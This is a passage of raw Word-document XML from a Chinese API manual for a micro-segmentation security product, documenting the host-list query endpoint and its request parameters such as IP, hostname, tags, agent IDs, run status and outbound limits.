          <w:p w14:paraId="5EE8CA2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07CFC379" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71BEF434" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45AB51CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586DCFF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="488AA7C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="_Toc115166290"/>
      <w:bookmarkStart w:id="436" w:name="微隔离主机管理接口"/>
      <w:bookmarkEnd w:id="420"/>
      <w:bookmarkEnd w:id="434"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微隔离主机管理接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
    </w:p>
    <w:p w14:paraId="0A53B805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="_Toc115166291"/>
      <w:bookmarkStart w:id="438" w:name="查询主机列表"/>
      <w:r>
        <w:t>查询主机列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p w14:paraId="48C73DCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9AE533" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/hosts/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="37579571"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2177"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="987"/>
        <w:gridCol w:w="5912"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="33FFE96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60CE791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281C8583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693AB247" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BD636C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E06FA0B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA9D2FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0FDAB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2446C8A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A8C28D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DC3E1BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB37E91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0B6335" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78E9BCB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F8EDB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EAFAE7D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EB7F735" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7293AD81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26741471" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E410027" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5152F041" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C5AE7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC35995" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37508C1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281BE5FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离插件开关：null全部 0关闭 1开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23B72622" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D7C32E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accessControlMode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7167A62E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="305F3743" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD7C541" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问控制模式：null全部 0服务控制 1主机控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E177E4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="443E9FD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31862158" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01B9EF96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5528ECF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02B37D83" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06550DCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FED29B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E23E14" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637460D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29CB81DF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE2AB8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DC63CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35ED413B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EC5025" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="692ABAD5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F420719" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2317480A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F336825" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="022F3C58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>在线状态,0离线 1在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35700193" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="274E666F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BC6DC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28CBCFF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF5454A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">是否可用: no </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B42E38A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F92824" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>runStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0585A85A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73982BCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FD576FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行状态，运行状态: warn告警 monitor监控 protect防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="580E2B9C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401FE2E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>limitOut</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="224F78A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD37661" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1471426E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>出站限制,0不允许出站 1允许出站</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="169C25FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32ABDB9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0614C4A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C8A0AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC898D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="755F18D7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F69D8A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>runLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA9BA5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5F5C12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715C1A05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>运行级别：0正常 1降级 2停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="375A0662" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C48E704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D3687B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="105C2355" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39C4360B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6221CE46" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B3B4E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702F801E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6952F150" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
